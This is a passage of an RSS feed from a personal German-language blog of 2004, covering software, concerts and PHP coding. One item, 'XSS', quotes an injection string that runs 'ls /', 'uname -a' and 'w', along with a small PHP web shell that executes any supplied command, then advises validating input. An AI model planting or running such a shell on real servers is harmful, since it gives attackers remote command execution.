  11530.    <description><![CDATA[<p>Seit ein paar Monaten, benutze ich <a href="" title="GnuCash - Open Source Accounting Software" lang="en" xml:lang="en">GnuCash</a> um mein "Vermögen" zu verwalten.</p><p>GnuCash wurde in erster Linie für Privatanwender und <abbr title="Kleine und mittlere Unternehmen">KMU</abbr>s entwickelt und bringt entsprechende Features mit:</p><ul><li>Doppelte Buchhaltung mit allem was dazugehört: Journal, Tansaktionen etc.</li><li>OFX Import (was leider in der Schweiz von keiner Bank angeboten wird)</li><li>HBCI-Untersützung (welche bisher vor allem in Deutschland angeboten wird)</li><li>QIF-Unterstützung</li><li>Generierung von Berichten</li><li>Aktienkurse aus dem Internet</li><li>Devisenkurse aus dem Internet</li><li>Handling von Aktien- und Fonds Portfolios</li><li>Kunden- und Lieferanten Verwaltung</li><li>Rechnungsverwaltung</li><li>Steuerverwaltung</li><li>Fristenverwaltung</li></ul>
  11531. ]]></description>
  11532.    <content:encoded><![CDATA[<p>Seit ein paar Monaten, benutze ich <a href="" title="GnuCash - Open Source Accounting Software" lang="en" xml:lang="en">GnuCash</a> um mein "Vermögen" zu verwalten.</p><p>GnuCash wurde in erster Linie für Privatanwender und <abbr title="Kleine und mittlere Unternehmen">KMU</abbr>s entwickelt und bringt entsprechende Features mit:</p><ul><li>Doppelte Buchhaltung mit allem was dazugehört: Journal, Tansaktionen etc.</li><li>OFX Import (was leider in der Schweiz von keiner Bank angeboten wird)</li><li>HBCI-Untersützung (welche bisher vor allem in Deutschland angeboten wird)</li><li>QIF-Unterstützung</li><li>Generierung von Berichten</li><li>Aktienkurse aus dem Internet</li><li>Devisenkurse aus dem Internet</li><li>Handling von Aktien- und Fonds Portfolios</li><li>Kunden- und Lieferanten Verwaltung</li><li>Rechnungsverwaltung</li><li>Steuerverwaltung</li><li>Fristenverwaltung</li></ul>
  11533. ]]></content:encoded>
  11534.  </item>
  11536.  <item>
  11537.    <title>XSS</title>
  11538.    <link></link>
  11539.    <guid isPermaLink="true"></guid>
  11540.    <dc:creator>Andreas Jaggi</dc:creator>
  11541.    <creativeCommons:license></creativeCommons:license>
  11542.    <pubDate>Sun, 16 May 2004 15:00:12 +0200</pubDate>
  11543.    <category domain="">Coding</category>
  11544.    <description><![CDATA[<pre>;cmd=ls%20/;uname%20-a;w
  11545.;cmd=ls%20/;uname%20-a;w</pre><p>Na, billige <a href="" title="Cross Site Scripting">XSS-Attacke</a> falsch angewendet.</p><p>In steht übrigens dieser PHP-Code.</p><pre>&lt;/center&gt;&lt;font size=&quot;2&quot;&gt;&lt;pre&gt;-
  11546. &lt;?
  11547.  if (isset($chdir)) @chdir($chdir);
  11548.  ob_start();
  11549.  system(&quot;$cmd 1&gt; /tmp/cmdtemp 2&gt;&amp;1; cat /tmp/cmdtemp; rm /tmp/cmdtemp&quot;);
  11550.  $output = ob_get_contents();
  11551.  ob_end_clean();
  11552.  if (!empty($output)) echo str_replace(&quot;&gt;&quot;, &quot;&amp;gt;&quot;, str_replace(&quot;&lt;&quot;, &quot;&amp;lt;&quot;, $output));
  11553. ?&gt;</pre><p>Merke: Immer alle nicht vertrauenswürdigen Input-Daten (e.g. alle per POST, GET, COOKIE übermittelten Daten) kontrollieren. Sehr oft werden hierzu <a href="" title="Character type functions - Manual">Character type functions</a> eingesetzt.</p>
  11554. ]]></description>
  11555.    <content:encoded><![CDATA[<pre>;cmd=ls%20/;uname%20-a;w
  11556.;cmd=ls%20/;uname%20-a;w</pre><p>Na, billige <a href="" title="Cross Site Scripting">XSS-Attacke</a> falsch angewendet.</p><p>In steht übrigens dieser PHP-Code.</p><pre>&lt;/center&gt;&lt;font size=&quot;2&quot;&gt;&lt;pre&gt;-
  11557. &lt;?
  11558.  if (isset($chdir)) @chdir($chdir);
  11559.  ob_start();
  11560.  system(&quot;$cmd 1&gt; /tmp/cmdtemp 2&gt;&amp;1; cat /tmp/cmdtemp; rm /tmp/cmdtemp&quot;);
  11561.  $output = ob_get_contents();
  11562.  ob_end_clean();
  11563.  if (!empty($output)) echo str_replace(&quot;&gt;&quot;, &quot;&amp;gt;&quot;, str_replace(&quot;&lt;&quot;, &quot;&amp;lt;&quot;, $output));
  11564. ?&gt;</pre><p>Merke: Immer alle nicht vertrauenswürdigen Input-Daten (e.g. alle per POST, GET, COOKIE übermittelten Daten) kontrollieren. Sehr oft werden hierzu <a href="" title="Character type functions - Manual">Character type functions</a> eingesetzt.</p>
  11565. ]]></content:encoded>
  11566.  </item>
  11568.  <item>
  11569.    <title>Dillo mit Tabs</title>
  11570.    <link></link>
  11571.    <guid isPermaLink="true"></guid>
  11572.    <dc:creator>Andreas Jaggi</dc:creator>
  11573.    <creativeCommons:license></creativeCommons:license>
  11574.    <pubDate>Sun, 16 May 2004 14:20:11 +0200</pubDate>
  11575.    <category domain="">Linux</category>
  11576.    <description><![CDATA[<p>Wie ich nach einem Update erfreut festgestellt habe, kann <a href="" lang="en" title="Dillo Web Browser (">Dillo</a> jetzt auch mit Tabs umgehen.</p><img src="" alt="Screenshot, Dillo - Open in New Tab">
  11577. ]]></description>
  11578.    <content:encoded><![CDATA[<p>Wie ich nach einem Update erfreut festgestellt habe, kann <a href="" lang="en" title="Dillo Web Browser (">Dillo</a> jetzt auch mit Tabs umgehen.</p><img src="" alt="Screenshot, Dillo - Open in New Tab">
  11579. ]]></content:encoded>
  11580.  </item>
  11582.  <item>
  11583.    <title>Balélec 2004</title>
  11584.    <link></link>
  11585.    <guid isPermaLink="true"></guid>
  11586.    <dc:creator>Andreas Jaggi</dc:creator>
  11587.    <creativeCommons:license></creativeCommons:license>
  11588.    <pubDate>Sun, 16 May 2004 12:36:21 +0200</pubDate>
  11589.    <category domain="">Music</category>
  11590.    <description><![CDATA[<p>Le vendredi j'étais au <a href="" title="Balélec 2004 (" lang="fr">Balélec</a> et c'était vachement cool. 30 groupes sur 7 scènes pour 20 Francs, cela on ne trouve pas ailleurs.</p><p>On se voit l'année prochaine, au 25-ième Balélec!</p>
  11591. ]]></description>
  11592.    <content:encoded><![CDATA[<p>Le vendredi j'étais au <a href="" title="Balélec 2004 (" lang="fr">Balélec</a> et c'était vachement cool. 30 groupes sur 7 scènes pour 20 Francs, cela on ne trouve pas ailleurs.</p><p>On se voit l'année prochaine, au 25-ième Balélec!</p>
  11593. ]]></content:encoded>
  11594.  </item>
  11596.  <item>
  11597.    <title>v2.04b</title>
  11598.    <link></link>
  11599.    <guid isPermaLink="true"></guid>
  11600.    <dc:creator>Andreas Jaggi</dc:creator>
  11601.    <creativeCommons:license></creativeCommons:license>
  11602.    <pubDate>Wed, 12 May 2004 16:31:00 +0200</pubDate>
  11603.    <category domain="">Misc</category>
  11604.    <description><![CDATA[Neue Features:<ul><li>Kommentarvorschau</li><li>On-the-fly Sprachwechsel der Navigationselemente (Deutsch/Französisch)</li></ul>
  11605. ]]></description>
  11606.    <content:encoded><![CDATA[Neue Features:<ul><li>Kommentarvorschau</li><li>On-the-fly Sprachwechsel der Navigationselemente (Deutsch/Französisch)</li></ul>
  11607. ]]></content:encoded>
  11608.  </item>
  11610.  <item>
  11611.    <title>Bouton Satellite</title>
  11612.    <link></link>
  11613.    <guid isPermaLink="true"></guid>
  11614.    <dc:creator>Andreas Jaggi</dc:creator>
  11615.    <creativeCommons:license></creativeCommons:license>
  11616.    <pubDate>Sat, 08 May 2004 16:55:00 +0200</pubDate>
  11617.    <category domain="">Music</category>
  11618.    <description><![CDATA[<p><a href="">Là</a> il y a 2170 boutons, mais aucun du <a href="">Satellite</a>. Donc j'ai crée moi-même un bouton pour le Satellite.</p><p><a href="" title="Satellite - Bar, Concerts, Cafés-Théâtres"><img src="" alt="Satellite - Bar, Concerts, Cafés-Théâtres" style="border: 0px;"></a></p>
  11619. ]]></description>
  11620.    <content:encoded><![CDATA[<p><a href="">Là</a> il y a 2170 boutons, mais aucun du <a href="">Satellite</a>. Donc j'ai crée moi-même un bouton pour le Satellite.</p><p><a href="" title="Satellite - Bar, Concerts, Cafés-Théâtres"><img src="" alt="Satellite - Bar, Concerts, Cafés-Théâtres" style="border: 0px;"></a></p>
  11621. ]]></content:encoded>
  11622.  </item>
  11624.  <item>
  11625.    <title>CVS</title>
  11626.    <link></link>
  11627.    <guid isPermaLink="true"></guid>
  11628.    <dc:creator>Andreas Jaggi</dc:creator>
  11629.    <creativeCommons:license></creativeCommons:license>
  11630.    <pubDate>Sat, 08 May 2004 14:00:00 +0200</pubDate>
  11631.    <category domain="">Linux</category>
  11632.    <description><![CDATA[<p>Momentan machen wir im <a href="" title="Cours de programmation II (">Programmieren</a> ein Projekt in Zweierteams. Um die ganze Codehandhabung zu vereinfachen, hat sich unser Team entschieden, <a href="" title="Concurrent Versions System">CVS</a> einzusetzen. CVS bietet eine zentrale Codeverwaltung mit Versions- und Konfliktsmanagement.</p><p>Da ich als CVS-Neuling das CLI-Interface nur grundlegend kenne, habe ich mich nach einem GUI-Interface umgeschaut. Dabei habe ich zwei überzeugende Programme gefunden: <a href="" title="TkCVS">TkCVS</a> und <a href="" title="LinCVS">LinCVS</a>, das auch auf Windows portiert wurde.</p>
  11633. ]]></description>
  11634.    <content:encoded><![CDATA[<p>Momentan machen wir im <a href="" title="Cours de programmation II (">Programmieren</a> ein Projekt in Zweierteams. Um die ganze Codehandhabung zu vereinfachen, hat sich unser Team entschieden, <a href="" title="Concurrent Versions System">CVS</a> einzusetzen. CVS bietet eine zentrale Codeverwaltung mit Versions- und Konfliktsmanagement.</p><p>Da ich als CVS-Neuling das CLI-Interface nur grundlegend kenne, habe ich mich nach einem GUI-Interface umgeschaut. Dabei habe ich zwei überzeugende Programme gefunden: <a href="" title="TkCVS">TkCVS</a> und <a href="" title="LinCVS">LinCVS</a>, das auch auf Windows portiert wurde.</p>
  11635. ]]></content:encoded>
  11636.  </item>
  11638.  <item>
  11639.    <title>Deadlock</title>
  11640.    <link></link>
  11641.    <guid isPermaLink="true"></guid>
  11642.    <dc:creator>Andreas Jaggi</dc:creator>
  11643.    <creativeCommons:license></creativeCommons:license>
  11644.    <pubDate>Sun, 02 May 2004 01:32:32 +0200</pubDate>
  11645.    <category domain="">Misc</category>
  11646.    <description><![CDATA[Am Freitag feierte die <a href="" title="Section d'Informatique" lang="fr">Section d'Informatique</a> ihr 20-jähriges Bestehen.<br>
  11647. Zuerst mussten 90 Minuten Reden diverser Professoren und ehemaliger Präsidenten der <a href="" title="Ecole Polytechnique Fédérale de Lausanne">EPFL</a> überstanden werden. Da jeder Redner noch ein bisschen in der Vergangenheit schweifte, wurden aus den 90 Minuten 2 Stunden. Aber danach gabs ein Apéro mit einem fünfgängigen Menu.<br>
  11648. Nachdem der offizielle Teil gebührend genossen war, gings ab zum <a href="" title="Deadlock 04 &amp; fete SSP (">Deadlock</a>. Da die Section d'Informatique einen Frauenanteil von 6% hat, wurde das Deadlock mit dem Fest der Sciences Sociales et Politiques der <a href="" title="Université de Lausanne">UNIL</a> (95% Frauenanteil) zusammengelegt :-)<br>
  11649. So konnte der Rest des Abends einfach nur gut werden. Doch um 3 Uhr morgens waren auch die sechs Konzerte zuende und ich durfte noch fast ne Stunde nach Hause radeln...
  11651. ]]></description>
  11652.    <content:encoded><![CDATA[Am Freitag feierte die <a href="" title="Section d'Informatique" lang="fr">Section d'Informatique</a> ihr 20-jähriges Bestehen.<br>
  11653. Zuerst mussten 90 Minuten Reden diverser Professoren und ehemaliger Präsidenten der <a href="" title="Ecole Polytechnique Fédérale de Lausanne">EPFL</a> überstanden werden. Da jeder Redner noch ein bisschen in der Vergangenheit schweifte, wurden aus den 90 Minuten 2 Stunden. Aber danach gabs ein Apéro mit einem fünfgängigen Menu.<br>
  11654. Nachdem der offizielle Teil gebührend genossen war, gings ab zum <a href="" title="Deadlock 04 &amp; fete SSP (">Deadlock</a>. Da die Section d'Informatique einen Frauenanteil von 6% hat, wurde das Deadlock mit dem Fest der Sciences Sociales et Politiques der <a href="" title="Université de Lausanne">UNIL</a> (95% Frauenanteil) zusammengelegt :-)<br>
  11655. So konnte der Rest des Abends einfach nur gut werden. Doch um 3 Uhr morgens waren auch die sechs Konzerte zuende und ich durfte noch fast ne Stunde nach Hause radeln...
  11657. ]]></content:encoded>
  11658.  </item>
  11660.  <item>
  11661.    <title>CH7</title>
  11662.    <link></link>
  11663.    <guid isPermaLink="true"></guid>
  11664.    <dc:creator>Andreas Jaggi</dc:creator>
  11665.    <creativeCommons:license></creativeCommons:license>
  11666.    <pubDate>Sun, 25 Apr 2004 12:47:09 +0200</pubDate>
  11667.    <category domain="">Cinema</category>
  11668.    <description><![CDATA[<p><a href="" title="CH7 - online">CH7</a> ist ein neuer Schweizer Fim, der nach dem "No Budget but high Quality" Prinzip produziert worden ist. Sämtliche Arbeit wurde ehrenatmlich geleistet und Sponsoren haben die Produktion unterstützt.</p><p>Die Macherinnen und Macher von CH7 wollen zu der heute grassierenden Copyright-Hysterie einen Gegenpol bilden. Deshalb ist kann man CH7 seit dem 24.04.04 im Internet frei <a href="" title="CH7 - Download">herunterladen</a> und straffrei kopieren. Diese Vertriebsart ist einmalig und neu. CH7 untersteht der <a href="" title="Creative Commons Deed">Creative Commons License</a>. Feel free to share!</p><p>Wer das Projekt unterstützen oder einfach nur danken möchte kann dies unter folgender Bankverbindung:<br><strong>CREDIT SUISSE<br>Clearing Nr. 4595<br>Konto 917917-90 Yvan Piccinno<br>Vermerk: CH7 Download</strong></p>
  11669. ]]></description>
  11670.    <content:encoded><![CDATA[<p><a href="" title="CH7 - online">CH7</a> ist ein neuer Schweizer Fim, der nach dem "No Budget but high Quality" Prinzip produziert worden ist. Sämtliche Arbeit wurde ehrenatmlich geleistet und Sponsoren haben die Produktion unterstützt.</p><p>Die Macherinnen und Macher von CH7 wollen zu der heute grassierenden Copyright-Hysterie einen Gegenpol bilden. Deshalb ist kann man CH7 seit dem 24.04.04 im Internet frei <a href="" title="CH7 - Download">herunterladen</a> und straffrei kopieren. Diese Vertriebsart ist einmalig und neu. CH7 untersteht der <a href="" title="Creative Commons Deed">Creative Commons License</a>. Feel free to share!</p><p>Wer das Projekt unterstützen oder einfach nur danken möchte kann dies unter folgender Bankverbindung:<br><strong>CREDIT SUISSE<br>Clearing Nr. 4595<br>Konto 917917-90 Yvan Piccinno<br>Vermerk: CH7 Download</strong></p>
  11671. ]]></content:encoded>
  11672.  </item>
  11674.  <item>
  11675.    <title>Sysmic 10</title>
  11676.    <link></link>
  11677.    <guid isPermaLink="true"></guid>
  11678.    <dc:creator>Andreas Jaggi</dc:creator>
  11679.    <creativeCommons:license></creativeCommons:license>
  11680.    <pubDate>Wed, 21 Apr 2004 21:01:45 +0200</pubDate>
  11681.    <category domain="">Misc</category>
  11682.    <description><![CDATA[Nun findet man bei den Einstellungen ein neues Layout, das dem Flyer vom <a href="" title="Sysmic 10 (">Sysmic</a> nachempfunden ist.
  11683. ]]></description>
  11684.    <content:encoded><![CDATA[Nun findet man bei den Einstellungen ein neues Layout, das dem Flyer vom <a href="" title="Sysmic 10 (">Sysmic</a> nachempfunden ist.
  11685. ]]></content:encoded>
  11686.  </item>
  11688.  <item>
  11689.    <title>Acronymizer</title>
  11690.    <link></link>
  11691.    <guid isPermaLink="true"></guid>
  11692.    <dc:creator>Andreas Jaggi</dc:creator>
  11693.    <creativeCommons:license></creativeCommons:license>
  11694.    <pubDate>Thu, 15 Apr 2004 19:35:22 +0200</pubDate>
  11695.    <category domain="">Coding</category>
  11696.    <description><![CDATA[<p><a href="" title="acronymizer.txt">Hier</a>  ist ein kleines Skript, welches in einem (X)HTML-Text nach Akronymen sucht und diese mit ihrer Definition ersetzt. Die Akronyme werden als assoziatives Array übergeben und können nicht nur die Definition sondern auch andere Attribute wie z.B. die Sprache mitbringen. Das Skript ersetzt nur Text ausserhalb von HTML-Tags und ersetzt keine Akronyme die schon mit dem entsprechenden Tag ausgerüstet sind.<br>Zusätzlich gibt es einen Anständigen Modus, in dem Akronyme nur ersetzt werden, wenn sie nicht in einem Wort integriert sind, sondern durch ein Zeichen davon getrennt sind. Die Trennzeichen werden auch als Parameter übergeben. So wird beispielsweise PHPprogrammierer im anständigen Modus nicht ersetzt, hingegen PHP-Programmierer schon.</p><p>Einfach mal anschauen, vielleicht kanns ja sonst noch jemand gebrauchen.</p>
  11697. ]]></description>
  11698.    <content:encoded><![CDATA[<p><a href="" title="acronymizer.txt">Hier</a>  ist ein kleines Skript, welches in einem (X)HTML-Text nach Akronymen sucht und diese mit ihrer Definition ersetzt. Die Akronyme werden als assoziatives Array übergeben und können nicht nur die Definition sondern auch andere Attribute wie z.B. die Sprache mitbringen. Das Skript ersetzt nur Text ausserhalb von HTML-Tags und ersetzt keine Akronyme die schon mit dem entsprechenden Tag ausgerüstet sind.<br>Zusätzlich gibt es einen Anständigen Modus, in dem Akronyme nur ersetzt werden, wenn sie nicht in einem Wort integriert sind, sondern durch ein Zeichen davon getrennt sind. Die Trennzeichen werden auch als Parameter übergeben. So wird beispielsweise PHPprogrammierer im anständigen Modus nicht ersetzt, hingegen PHP-Programmierer schon.</p><p>Einfach mal anschauen, vielleicht kanns ja sonst noch jemand gebrauchen.</p>
  11699. ]]></content:encoded>
  11700.  </item>
  11702.  <item>
  11703.    <title>Playlist</title>
  11704.    <link></link>
  11705.    <guid isPermaLink="true"></guid>
  11706.    <dc:creator>Andreas Jaggi</dc:creator>
  11707.    <creativeCommons:license></creativeCommons:license>
  11708.    <pubDate>Thu, 15 Apr 2004 18:12:21 +0200</pubDate>
  11709.    <category domain="">Misc</category>
  11710.    <description><![CDATA[<p><a href="" title="Markus Kniebes">Markus Kniebes</a> hat ein <a href="" title="Am Rande der Sinnlosigkeit">Skript</a> geschrieben, welches mittels einer MySQL-Datenbank eine Übersicht über die abgespielten Musikstücke erstellt. Erinnert mich ein bisschen an die Playlists in iTunes. Meine Playlist findet man <a href="" title="Playlist">hier</a> :-)</p>
  11711. ]]></description>
  11712.    <content:encoded><![CDATA[<p><a href="" title="Markus Kniebes">Markus Kniebes</a> hat ein <a href="" title="Am Rande der Sinnlosigkeit">Skript</a> geschrieben, welches mittels einer MySQL-Datenbank eine Übersicht über die abgespielten Musikstücke erstellt. Erinnert mich ein bisschen an die Playlists in iTunes. Meine Playlist findet man <a href="" title="Playlist">hier</a> :-)</p>
  11713. ]]></content:encoded>
  11714.  </item>
  11716.  <item>
  11717.    <title>Na</title>
  11718.    <link></link>
  11719.    <guid isPermaLink="true"></guid>
  11720.    <dc:creator>Andreas Jaggi</dc:creator>
  11721.    <creativeCommons:license></creativeCommons:license>
  11722.    <pubDate>Thu, 15 Apr 2004 17:16:41 +0200</pubDate>
  11723.    <category domain="">Misc</category>
  11724.    <description><![CDATA[<ol><li>Grab the nearest book.</li><li>Open the book to page 23.</li><li>Find the fifth sentence.</li><li>Post the text of the sentence in your journal along with these instructions.</li></ol><blockquote lang="en"><p>In symbols, the average acceleration <em>a</em>, over a time interval <em>&#916;t</em> = <em>t<sub>2</sub></em> - <em>t<sub>1</sub></em> during which the velocity changes by <em>&#916;v</em> = <em>v<sub>2</sub></em> - <em>v<sub>1</sub></em>, is defined as<br><em>a</em> = <em>(v<sub>2</sub> - v<sub>1</sub>)</em>/<em>(t<sub>2</sub> - t<sub>1</sub>)</em> = <em>&#916;v</em>/<em>&#916;t</em>.</p><p>Douglas C. Giancoli - Physics for Scientists &amp; Engineers</p></blockquote><p>Via <a href="" title="Dunkle Zeiten">Dunkle Zeiten</a>.</p>
  11725. ]]></description>
  11726.    <content:encoded><![CDATA[<ol><li>Grab the nearest book.</li><li>Open the book to page 23.</li><li>Find the fifth sentence.</li><li>Post the text of the sentence in your journal along with these instructions.</li></ol><blockquote lang="en"><p>In symbols, the average acceleration <em>a</em>, over a time interval <em>&#916;t</em> = <em>t<sub>2</sub></em> - <em>t<sub>1</sub></em> during which the velocity changes by <em>&#916;v</em> = <em>v<sub>2</sub></em> - <em>v<sub>1</sub></em>, is defined as<br><em>a</em> = <em>(v<sub>2</sub> - v<sub>1</sub>)</em>/<em>(t<sub>2</sub> - t<sub>1</sub>)</em> = <em>&#916;v</em>/<em>&#916;t</em>.</p><p>Douglas C. Giancoli - Physics for Scientists &amp; Engineers</p></blockquote><p>Via <a href="" title="Dunkle Zeiten">Dunkle Zeiten</a>.</p>
  11727. ]]></content:encoded>
  11728.  </item>
  11730.  <item>
  11731.    <title>Mozilla Bug</title>
  11732.    <link></link>
  11733.    <guid isPermaLink="true"></guid>
  11734.    <dc:creator>Andreas Jaggi</dc:creator>
  11735.    <creativeCommons:license></creativeCommons:license>
  11736.    <pubDate>Thu, 15 Apr 2004 01:55:52 +0200</pubDate>
  11737.    <category domain="">Webdesign</category>
  11738.    <description><![CDATA[<img src="" width="132" height="198" alt="Screenshot vom Bug"><p>Wie ich <a href="" title="Andrew Porter Glendinning">Andrew Porter Glendinning</a> besuchte, entdeckte ich diesen Graphikfehler in Mozilla. Der Text lautet </p><blockquote lang="en"><p>If you can read this, your browser doesn't support the over 4-year-old <a href="">CSS Level 2 Recommendation</a>. These icons should be fixed in the lower right corner of your browser window, and this message should be invisible.</p></blockquote><p>Nach der Analyse des Stylesheets, habe ich herausgefunden, dass der Text eigentlich ausserhalb des Browserfensters dargestellt werden sollte. Bei Mozilla hört das Browserfenster vor dem Scrollbalken auf, jedoch für die Rendering-Engine erst am Fensterrand :-P</p>
  11739. ]]></description>
  11740.    <content:encoded><![CDATA[<img src="" width="132" height="198" alt="Screenshot vom Bug"><p>Wie ich <a href="" title="Andrew Porter Glendinning">Andrew Porter Glendinning</a> besuchte, entdeckte ich diesen Graphikfehler in Mozilla. Der Text lautet </p><blockquote lang="en"><p>If you can read this, your browser doesn't support the over 4-year-old <a href="">CSS Level 2 Recommendation</a>. These icons should be fixed in the lower right corner of your browser window, and this message should be invisible.</p></blockquote><p>Nach der Analyse des Stylesheets, habe ich herausgefunden, dass der Text eigentlich ausserhalb des Browserfensters dargestellt werden sollte. Bei Mozilla hört das Browserfenster vor dem Scrollbalken auf, jedoch für die Rendering-Engine erst am Fensterrand :-P</p>
  11741. ]]></content:encoded>
  11742.  </item>
  11744.  <item>
  11745.    <title>Sicheres Programmieren mit PHP</title>
  11746.    <link></link>
  11747.    <guid isPermaLink="true"></guid>
  11748.    <dc:creator>Andreas Jaggi</dc:creator>
  11749.    <creativeCommons:license></creativeCommons:license>
  11750.    <pubDate>Thu, 15 Apr 2004 00:30:34 +0200</pubDate>
  11751.    <category domain="">Coding</category>
  11752.    <description><![CDATA[<ul>
  11753. <li><a href="" title="Secure Programming in PHP (">Secure Programming in PHP</a></li><li><a href=",action:view,id:11" title="Writing Secure PHP Code (">Writing Secure PHP Code</a></li><li><a href="" title="On the Security of PHP, Part 1">On the Security of PHP, Part 1</a></li><li><a href="" title="On the Security of PHP, Part 2">On the Security of PHP, Part 2</a></li>
  11754. </ul><p>Uff, Glück gehabt. Die erwähnten Punkte habe ich fast alle berücksichtigt, und die ausgelassenen Sicherheitslücken funktionieren mit der hier installierten <abbr title="PHP Hypertext Preprocessor">PHP</abbr>-Version nicht mehr :-)</p><p>Via <a href="" title=" ("></a></p>
  11755. ]]></description>
  11756.    <content:encoded><![CDATA[<ul>
  11757. <li><a href="" title="Secure Programming in PHP (">Secure Programming in PHP</a></li><li><a href=",action:view,id:11" title="Writing Secure PHP Code (">Writing Secure PHP Code</a></li><li><a href="" title="On the Security of PHP, Part 1">On the Security of PHP, Part 1</a></li><li><a href="" title="On the Security of PHP, Part 2">On the Security of PHP, Part 2</a></li>
  11758. </ul><p>Uff, Glück gehabt. Die erwähnten Punkte habe ich fast alle berücksichtigt, und die ausgelassenen Sicherheitslücken funktionieren mit der hier installierten <abbr title="PHP Hypertext Preprocessor">PHP</abbr>-Version nicht mehr :-)</p><p>Via <a href="" title=" ("></a></p>
  11759. ]]></content:encoded>
  11760.  </item>
  11762.  <item>
  11763.    <title>Developing With Web Standards</title>
  11764.    <link></link>
  11765.    <guid isPermaLink="true"></guid>
  11766.    <dc:creator>Andreas Jaggi</dc:creator>
  11767.    <creativeCommons:license></creativeCommons:license>
  11768.    <pubDate>Wed, 14 Apr 2004 21:07:50 +0200</pubDate>
  11769.    <category domain="">Webdesign</category>
  11770.    <description><![CDATA[<p><a href="" title="Developing With Web Standards">Developing With Web Standards</a> Recommendations and best practices. Eine gute Übersicht, auch geeignet um Leute in die Thematik einzuführen.</p><p>Via <a href="" title="LinkDump">LinkDump</a></p>
  11771. ]]></description>
  11772.    <content:encoded><![CDATA[<p><a href="" title="Developing With Web Standards">Developing With Web Standards</a> Recommendations and best practices. Eine gute Übersicht, auch geeignet um Leute in die Thematik einzuführen.</p><p>Via <a href="" title="LinkDump">LinkDump</a></p>
  11773. ]]></content:encoded>
  11774.  </item>
  11776.  <item>
  11777.    <title>Warum?</title>
  11778.    <link></link>
  11779.    <guid isPermaLink="true"></guid>
  11780.    <dc:creator>Andreas Jaggi</dc:creator>
  11781.    <creativeCommons:license></creativeCommons:license>
  11782.    <pubDate>Tue, 13 Apr 2004 18:36:15 +0200</pubDate>
  11783.    <category domain="">Coding</category>
  11784.    <description><![CDATA[<p>Kann mir jemand den Gedanken hinter folgendem Verhalten von <a href="" title="PEAR :: Package :: XML_RPC">XML_RPC</a> erklären?</p><p>Ich bin dabei, einige <abbr title="eXtensible Markup Language - Remote Procedure Call protocol">XML-RPC</abbr> Webservices in <abbr title="PHP Hypertext Preprocessor">PHP</abbr> zu programmieren. Leider gabs immer eine Fehlermeldung wenn ich eine bestimmte Funktion aufrufe.</p><p>Zuerst suchte ich den Fehler in der Funktion beim XML-RPC-Server. Jedoch funktionierte die problemlos. Danach habe ich eine Ewigkeit mit den via XML-RPC übergebenen Parameter herumgespielt, hat jedoch nichts gebracht.</p><p>Dann habe ich in der XML-RPC-Klasse das Debug-Flag aktiviert. So konnte ich herausfinden, dass der XML-RPC-Server die Ausgabewerte der Funktionen übergibt, was ja auch so sein muss. Das Debug-Flag machte auch, dass im XML-RPC-Client die empfangenen XML-Daten ausgegeben werden. Diese entsprachen den vom Server gesendeten. Doch leider gab mir das Debug-Flag keine Information warum das Parsen der XML-Daten fehlschlug.</p><p>So habe ich mir mal den Code der XML-RPC-Klasse angeschaut und habe dort eine Funktion error_log entdeckt. Diese Funktion ist in PHP eingebaut und sendet eine Fehlermeldung. Nach dem Studium der <a href="" title="PHP-Manual: error_log">Dokumentation</a> habe ich herausgefunden, dass die Fehlermeldungen damit in den Error-Log vom Apache geschrieben werden!</p><p>Also habe ich mir /var/log/apache2/error_log vorgenommen. Darin fand ich Fehlermeldungen des XML-Parsers, der sich über ein invalid token beschwerte!</p><p> Nach längerem Herumexperimentieren mit den Eingabewerten, fand ich heraus, dass der XML-Parser an einem nicht enkodierten Umlaut scheiterte.</p><p>Da ich Umlaute nicht mehr enkodiere, sondern einfach das entsprechende encoding="iso-8859-15" Attribut setzte, kontrollierte ich zuerst den XML-Header, wie er von der XML-RPC-Klasse generiert wird. Dort fand ich dann auch den Fehler: es wird kein encoding Attribut erzeugt.</p><p>Warum werden nicht alle Umlaute etc. automatisch enkodiert, wenn kein encoding Attribut mitgeliefert wird?</p><p>Warum gibt es ein Debug-Flag, aber Fehlermeldungen werden trotzdem nicht ausgegeben sondern weiterhin nur nach /var/log/apache2/error_log geschrieben?</p>
  11785. ]]></description>
  11786.    <content:encoded><![CDATA[<p>Kann mir jemand den Gedanken hinter folgendem Verhalten von <a href="" title="PEAR :: Package :: XML_RPC">XML_RPC</a> erklären?</p><p>Ich bin dabei, einige <abbr title="eXtensible Markup Language - Remote Procedure Call protocol">XML-RPC</abbr> Webservices in <abbr title="PHP Hypertext Preprocessor">PHP</abbr> zu programmieren. Leider gabs immer eine Fehlermeldung wenn ich eine bestimmte Funktion aufrufe.</p><p>Zuerst suchte ich den Fehler in der Funktion beim XML-RPC-Server. Jedoch funktionierte die problemlos. Danach habe ich eine Ewigkeit mit den via XML-RPC übergebenen Parameter herumgespielt, hat jedoch nichts gebracht.</p><p>Dann habe ich in der XML-RPC-Klasse das Debug-Flag aktiviert. So konnte ich herausfinden, dass der XML-RPC-Server die Ausgabewerte der Funktionen übergibt, was ja auch so sein muss. Das Debug-Flag machte auch, dass im XML-RPC-Client die empfangenen XML-Daten ausgegeben werden. Diese entsprachen den vom Server gesendeten. Doch leider gab mir das Debug-Flag keine Information warum das Parsen der XML-Daten fehlschlug.</p><p>So habe ich mir mal den Code der XML-RPC-Klasse angeschaut und habe dort eine Funktion error_log entdeckt. Diese Funktion ist in PHP eingebaut und sendet eine Fehlermeldung. Nach dem Studium der <a href="" title="PHP-Manual: error_log">Dokumentation</a> habe ich herausgefunden, dass die Fehlermeldungen damit in den Error-Log vom Apache geschrieben werden!</p><p>Also habe ich mir /var/log/apache2/error_log vorgenommen. Darin fand ich Fehlermeldungen des XML-Parsers, der sich über ein invalid token beschwerte!</p><p> Nach längerem Herumexperimentieren mit den Eingabewerten, fand ich heraus, dass der XML-Parser an einem nicht enkodierten Umlaut scheiterte.</p><p>Da ich Umlaute nicht mehr enkodiere, sondern einfach das entsprechende encoding="iso-8859-15" Attribut setzte, kontrollierte ich zuerst den XML-Header, wie er von der XML-RPC-Klasse generiert wird. Dort fand ich dann auch den Fehler: es wird kein encoding Attribut erzeugt.</p><p>Warum werden nicht alle Umlaute etc. automatisch enkodiert, wenn kein encoding Attribut mitgeliefert wird?</p><p>Warum gibt es ein Debug-Flag, aber Fehlermeldungen werden trotzdem nicht ausgegeben sondern weiterhin nur nach /var/log/apache2/error_log geschrieben?</p>
  11787. ]]></content:encoded>
  11788.  </item>
  11790.  <item>
  11791.    <title>RSS, TrackBack</title>
  11792.    <link></link>
  11793.    <guid isPermaLink="true"></guid>
